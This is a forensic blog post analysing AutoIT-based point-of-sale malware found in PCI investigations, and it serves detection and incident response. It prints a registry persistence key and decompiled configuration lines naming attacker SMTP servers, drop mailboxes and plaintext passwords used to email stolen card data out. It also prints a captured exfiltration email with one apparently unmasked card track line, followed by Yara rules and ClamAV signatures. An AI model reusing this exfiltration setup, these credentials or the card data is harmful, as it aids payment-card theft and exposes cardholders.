AutoIT Scripting in POS Malware

By Stephen Evans ·

Over the past few years, using AutoIT scripting language to create and install malware has become more prevalent.12 This trend has made its way into the POS environment as well. In three of my recent PFIs (PCI Forensic Investigations), I've come across POS malware that uses AutoIT scripting.

On two of the PFIs, the AutoIT script was named 'wow32.exe' with file sizes of 386,189 and 386,183 bytes. The third used a script named ‘cbs.exe.exe’ with a file size of 385,312 bytes.

Let’s take a look at how attackers used these scripts to compromise the environment and obtain cardholder data.

First, the attacker creates a registry key that launches the script whenever a user logs in, which means it's basically a startup program.

+ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  - Name : systemupdater
  - Value : C:\WINDOWS\system32\1025\wow32.exe CCS.exe

'CCS.exe' is a POS server process, so the malware isn't restricted to any particular payment application software.

'wow2.exe' calls 'winhttp.exe' ('sr.exe' on the 3rd PFI), which injects a third piece of malware ('Searcher.dll')3 into the POS process and does the actual scraping CHD and data tracking. It then writes it to a file with file name format '%s%i_%s_%i.log' (example: '5776_CCS.exe_66789.log') in 'C:\WINDOWS\system32\'.

Back to 'wow32.exe'. It uses a legitimate Microsoft library 'cdosys.dll' - which the attacker bundles with the other malware pieces - to exfiltrate the captured data via email attachments using the parameters specified in the AutoIT script.4

I used one of the many UPX unpackers on the 'wow32.exe' and 'cbs.exe.exe' executables. Next, I used a very excellent open source tool, ‘myAutToExe.exe’,5 to decompile them and compare about 4,800 lines of AutoIT source code using the built-in Windows file compare tool, 'fc.exe'.

Here are the differences:

***** WOW32-DECOMPILE1.AU3
$PRG = "winhttp.exe"
$INTERVAL = 12
$SMTPSERVER = "67.23.166.11"
$FROMNAME = "HaHaHa ProductionN"
$FROMADDRESS = "hahaha@production.com"
$TOADDRESS = "altelenoi2012@yahoo.com"
$SUBJECT = @ComputerName & " - " & @IPAddress1
$BODY = @IPAddress1 & " - " & @IPAddress2
$CCADDRESS = ""
***** wow32-decompile2.au3
$PRG = "winhttp.exe"
$INTERVAL = 12
$SMTPSERVER = "67.23.166.11"
$FROMNAME = "HaHaHa Production"
$FROMADDRESS = "hahaha@production.com"
$TOADDRESS = "bugs1122@yahoo.com"
$SUBJECT = @ComputerName & " - " & @IPAddress1
$BODY = @IPAddress1 & " - " & @IPAddress2
$CCADDRESS = ""
***** cbs.exe-decompile.au3
$PRG = "sr.exe"
$INTERVAL = 12
$SMTPSERVER = "mail.boston-bob.eu"
$FROMNAME = "Messi"
$FROMADDRESS = "john@balboa.us"
$TOADDRESS = "paris.paris2244@yahoo.com"
$SUBJECT = @ComputerName
$BODY = @IPAddress1 & "-" & @IPAddress1
$CCADDRESS = ""
*****

***** WOW32-DECOMPILE1.AU3
$BCCADDRESS = ""
$USERNAME = "websend02@safe-deals.biz"
$PASSWORD = "rWRCRoyDGf1J"
$IPPORT = 25
***** wow32-decompile2.AU3
$BCCADDRESS = ""
$USERNAME = "websend02@safe-deals.biz"
$PASSWORD = "rWRCRoyDGf1J"
$IPPORT = 25
***** cbs.exe-decompile.au3
$BCCADDRESS = ""
$USERNAME = "bob@boston-bob.eu"
$PASSWORD = "B$Gs&yH9HytZ"
$IPPORT = 25
*****

 

Normally in a PFI for Level 3 and 4 merchants, there's no evidence of exfiltration because firewall logs and network traffic capture aren't available. But I got lucky. In 'pagefile.sys' I found an email with six attachments and 30 PANs with track data ('X' is used to mask sensitive data):

Ac8Ot5czDGFoz6MMRECUfYTSP0/OQg==
Thread-Topic: XXXXXXXXXX - 192.168.xxx.xx
From: "HaHaHa ProductionN" 
To: 
Subject: XXXXXXXXXX - 192.168.xxx.xxx
Date: Sat, 11 Jan 2014 02:26:29 -0800
Message-ID: <040531DAC0B84353AF4547B312107D3B@XXXXXXXXXX>
MIME-Version: 1.0
Content-Type: multipart/mixed;
       boundary="----=_NextPart_000_0219_01CF0E74.89105D60"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: Normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4913

This is a multi-part message in MIME format.

------=_NextPart_000_0219_01CF0E74.89105D60
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

192.168.xxx.xx - 192.168.xx.xxx
CCS.exe was closed.
C:\WINDOWS\system32\1628_CCS.exe_86632.log.tmp:231:4342562158492478=
16021010000000175
C:\WINDOWS\system32\5596_CCS.exe_96690.log.tmp:0:

------=_NextPart_000_0219_01CF0E74.89105D60
Content-Type: application/octet-stream;
       name="1628_CCS.exe_86632.log.tmp"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
       filename="1628_CCS.exe_86632.log.tmp"

434256xxxxxx2478=1602101xxxxxxxxxx
421764xxxxxx1907=1512101xxxxxxxxxxxxx
483316xxxxxx7360=1604101xxxxxxxxxxxxx
428208xxxxxx2685=1609101xxxxxxxxxxxxx
428208xxxxxx5519=1411101xxxxxxxxxxxxx
371242xxxxxx3004=1706101xxxxxxxxxxxxxx
[rest of email truncated]

 

I wrote Yara rules for the set of malware using unique keywords, and sure enough, I found evidence - using Volatility on the POS server memory dump - that ‘Searcher.dll’ was indeed injected into the POS process ‘CCS.exe’.

../../volatility-2.3.1/vol.py --profile=Win2003SP2x86 -f ./memdump.mem yarascan 
--yara-file=../yara/rules-PFI-malware.yara

Rule: Searcher_dll
Owner: Process CCS.exe Pid 3704
0x7c55a1dc  45 6e 63 6f 64 65 50 6f 69 6e 74 65 72 00 00 00   EncodePointer...
0x7c55a1ec  4b 00 45 00 52 00 4e 00 45 00 4c 00 33 00 32 00   K.E.R.N.E.L.3.2.
0x7c55a1fc  2e 00 44 00 4c 00 4c 00 00 00 00 00 44 65 63 6f   ..D.L.L.....Deco
0x7c55a20c  64 65 50 6f 69 6e 74 65 72 00 00 00 46 6c 73 46   dePointer...FlsF
Rule: Searcher_dll
Owner: Process CCS.exe Pid 3704
0x7c55b32c  43 4f 4e 4f 55 54 24 00 53 75 6e 4d 6f 6e 54 75   CONOUT$.SunMonTu
0x7c55b33c  65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00   eWedThuFriSat...
0x7c55b34c  4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a   JanFebMarAprMayJ
0x7c55b35c  75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f   unJulAugSepOctNo
Rule: Searcher_dll
Owner: Process CCS.exe Pid 3704
0x7c55b37c  25 73 25 69 5f 25 73 5f 25 69 2e 6c 6f 67 00 00   %s%i_%s_%i.log..
0x7c55b38c  00 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00   ....H...........
0x7c55b39c  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x7c55b3ac  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

 

I wrote some ClamAV signatures to detect the malware set using the ClamAV ‘sigtool’.

For the pieces that have the same MD5 hash, these go in an *.hdb signature file (MD5 hash, file size, file name).

85fd14b070f47f0c27aed18359fdd2ad:2067968:cdosys.dll
eb53db9ccf7ba39750e797ebf48bbdef:55296:winhttp.exe
0d54107cb2a79550c349ababc28c71cb:55808:Searcher.dll

 

The Yara rules for use in Volatility were written based on unique keywords:

rule wow32_exe
{
       meta:
              description = "wow32-exe"
              thread_level = 3
              in_the_wild = true

       strings:
              $a = "avsupport@autoitscript.com" wide ascii
              $b = "compiled AutoIt script" wide ascii

       condition:
              $a and $b
}

rule cdosys_dll
{
       meta:
              description = "cdosys-dll"
              thread_level = 3
              in_the_wild = true

       strings:
              $a = "Microsoft CDO for Windows Library" wide ascii
              $b = "CDOSYS.DLL" wide ascii

       condition:
              $a and $b
}

rule winhttp_exe
{
       meta:
              description = "winhttp-exe"
              thread_level = 3
              in_the_wild = true

       strings:
              $a = "SeDebugPrivilege" wide ascii
              $b = "SearchInject" wide ascii
              $c = "Searcher.dll" wide ascii

       condition:
              $a and $b and $c
}

rule Searcher_dll
{
       meta:
              description = "Searcher-dll"
              thread_level = 3
              in_the_wild = true

       strings:
              $a = "EncodePointer" wide ascii
              $b = "CONOUT$" wide ascii
              $c = "%s%i_%s_%i.log" wide ascii

       condition:
              $a and $b and $c
}

I used the same unique keywords to write ClamAV signatures. Note: Each signature should be on one line.

wow32-exe;Target:0;(0&1); 6176737570706f7274406175746f69747363726970742e636f6d;
636f6d70696c6564204175746f497420736372697074
cdosys-dll;Target:0;(0&1); 4d6963726f736f66742043444f20666f722057696e646f7773204c696272617279;
43444f5359532e444c4c
winhttp-exe;Target:0;(0&1&2); 5365446562756750726976696c656765;536561726368496e6a656374;
53656172636865722e646c6c
Searcher-dll;Target:0;(0&1&2); 456e636f6465506f696e746572;434f4e4f555424;
257325695f25735f25692e6c6f67

For 'wow32.exe', keep in mind that ClamAV will unpack UPX files then run signatures against the unpacked file, but it will not automatically decompile the AutoIT script.


References:

1. Autoit Malware Revisited

2. Autoit Used to Spread Malware and Toolsets/

3. POS Malware Attacks on Kernel Memory

4. Microsoft Support

5. Deioncube